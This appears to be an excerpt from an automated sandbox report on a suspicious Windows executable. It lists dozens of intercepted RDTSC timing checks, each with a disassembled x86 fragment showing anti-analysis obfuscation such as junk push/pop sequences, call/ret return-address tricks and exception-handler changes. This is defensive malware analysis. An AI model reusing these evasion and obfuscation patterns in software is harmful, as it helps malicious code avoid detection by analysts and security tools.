              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0ACC second address: AD0AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0AD6 second address: AD0ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0ADA second address: AD0AE4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD84520DEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD10B9 second address: AD10C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD845024956h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD2638 second address: AD265D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD84520DEECh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FD84520DEECh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD2ED3 second address: AD2ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD2ED7 second address: AD2EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD2F96 second address: AD2FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a nop 0x0000000b jmp 00007FD84502495Dh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FD845024956h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD2FB9 second address: AD2FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD352E second address: AD3532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD3532 second address: AD3538 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD3AD4 second address: AD3B3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1C94h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FD845024958h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov esi, dword ptr [ebp+122D2DB4h] 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D1C94h], ecx 0x0000003a xchg eax, ebx 0x0000003b jl 00007FD845024967h 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007FD84502495Dh 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jp 00007FD84502495Ch 0x00000053 jns 00007FD845024956h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD5648 second address: AD564C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD564C second address: AD5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FD845024958h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD5660 second address: AD5664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD5664 second address: AD56E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D202Eh], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FD845024958h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D30E8h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FD845024958h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 movzx esi, ax 0x00000053 xchg eax, ebx 0x00000054 jmp 00007FD84502495Ah 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007FD845024964h 0x00000062 push esi 0x00000063 pop esi 0x00000064 popad 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD78BF second address: AD78C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD769F second address: AD76A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD78C3 second address: AD78CD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD84520DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD76A5 second address: AD76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD76A9 second address: AD76C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD76C5 second address: AD76C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD8EED second address: AD8F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 add esi, dword ptr [ebp+122D3A2Dh] 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FD84520DEE8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3CDCh], esi 0x0000002e add dword ptr [ebp+122D3993h], eax 0x00000034 push 00000000h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD8F2C second address: AD8F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD8F33 second address: AD8F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD84520DEECh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCD7 second address: ADBCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCDB second address: ADBCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCDF second address: ADBCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCEC second address: ADBCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCF0 second address: ADBCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADBCFF second address: ADBD05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADC295 second address: ADC29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADE177 second address: ADE18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD84520DEF0h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADD3B3 second address: ADD3C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADE18E second address: ADE1B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD84520DEF8h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF17E second address: ADF184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF184 second address: ADF197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007FD84520DEF4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF197 second address: ADF19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF19B second address: ADF229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FD84520DEE8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 call 00007FD84520DEF7h 0x00000028 pushad 0x00000029 movsx ecx, si 0x0000002c or ebx, dword ptr [ebp+122D2050h] 0x00000032 popad 0x00000033 pop edi 0x00000034 or dword ptr [ebp+12478F36h], edi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FD84520DEE8h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 xchg eax, esi 0x00000057 jmp 00007FD84520DEF0h 0x0000005c push eax 0x0000005d jnp 00007FD84520DEF0h 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF357 second address: ADF35B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF35B second address: ADF361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE12FA second address: AE130D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD845024958h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADF361 second address: ADF3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FD84520DEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov ebx, dword ptr [ebp+122D3CDCh] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FD84520DEE8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D202Eh], eax 0x0000003e xor bl, FFFFFFD9h 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007FD84520DEE8h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 00000019h 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 and edi, dword ptr [ebp+122D2FE8h] 0x00000068 movsx ebx, bx 0x0000006b mov dword ptr [ebp+122D394Ch], eax 0x00000071 mov eax, dword ptr [ebp+122D0255h] 0x00000077 sbb edi, 1D28A2A5h 0x0000007d push FFFFFFFFh 0x0000007f movzx edi, ax 0x00000082 push eax 0x00000083 jl 00007FD84520DEF0h 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE13BE second address: AE13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE3AEC second address: AE3AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE3D9D second address: AE3DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE5BEC second address: AE5BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD84520DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEB405 second address: AEB487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007FD84502495Dh 0x00000010 sbb di, EA16h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FD845024958h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+1247B669h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FD845024958h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D2356h] 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FD845024963h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC3F0 second address: AEC3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC3F4 second address: AEC424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD845024961h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC424 second address: AEC42E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD84520DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC42E second address: AEC493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FD845024958h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+1246E0E5h], ecx 0x0000002b push 00000000h 0x0000002d call 00007FD845024962h 0x00000032 call 00007FD845024963h 0x00000037 pop edi 0x00000038 pop edi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jg 00007FD845024956h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE6E3A second address: AE6E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD84520DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC493 second address: AEC499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE6E44 second address: AE6ED4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD84520DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007FD84520DEF7h 0x00000012 xor dword ptr [ebp+1244FD0Ch], ebx 0x00000018 pop ebx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov ebx, dword ptr [ebp+122D3C20h] 0x00000026 mov ebx, dword ptr [ebp+122D2E78h] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov ebx, dword ptr [ebp+122D30C0h] 0x00000039 mov di, cx 0x0000003c mov eax, dword ptr [ebp+122D1369h] 0x00000042 push esi 0x00000043 add di, 0E1Bh 0x00000048 pop edi 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007FD84520DEE8h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D3CB4h], edx 0x0000006b nop 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jc 00007FD84520DEE6h 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE8E90 second address: AE8EA6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEC499 second address: AEC49E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE6ED4 second address: AE6EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE5DF8 second address: AE5DFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE6EE6 second address: AE6EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD84502495Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE5DFE second address: AE5EAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD84520DEF6h 0x0000000f pop edx 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D3014h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FD84520DEE8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 jnc 00007FD84520DEECh 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov eax, dword ptr [ebp+122D0229h] 0x0000004b call 00007FD84520DEF9h 0x00000050 mov ebx, dword ptr [ebp+122D2FA8h] 0x00000056 pop ebx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ecx 0x0000005c call 00007FD84520DEE8h 0x00000061 pop ecx 0x00000062 mov dword ptr [esp+04h], ecx 0x00000066 add dword ptr [esp+04h], 00000015h 0x0000006e inc ecx 0x0000006f push ecx 0x00000070 ret 0x00000071 pop ecx 0x00000072 ret 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jc 00007FD84520DEE6h 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AE5EAE second address: AE5EB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AED4B2 second address: AED530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FD84520DEEAh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD84520DEE8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov di, ax 0x00000029 and bx, DE09h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D21FFh], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FD84520DEE8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D309Ch] 0x00000058 mov di, FF4Ah 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 jc 00007FD84520DEE6h 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEE753 second address: AEE768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD845024961h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AEE768 second address: AEE76C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF198E second address: AF19A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD845024965h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
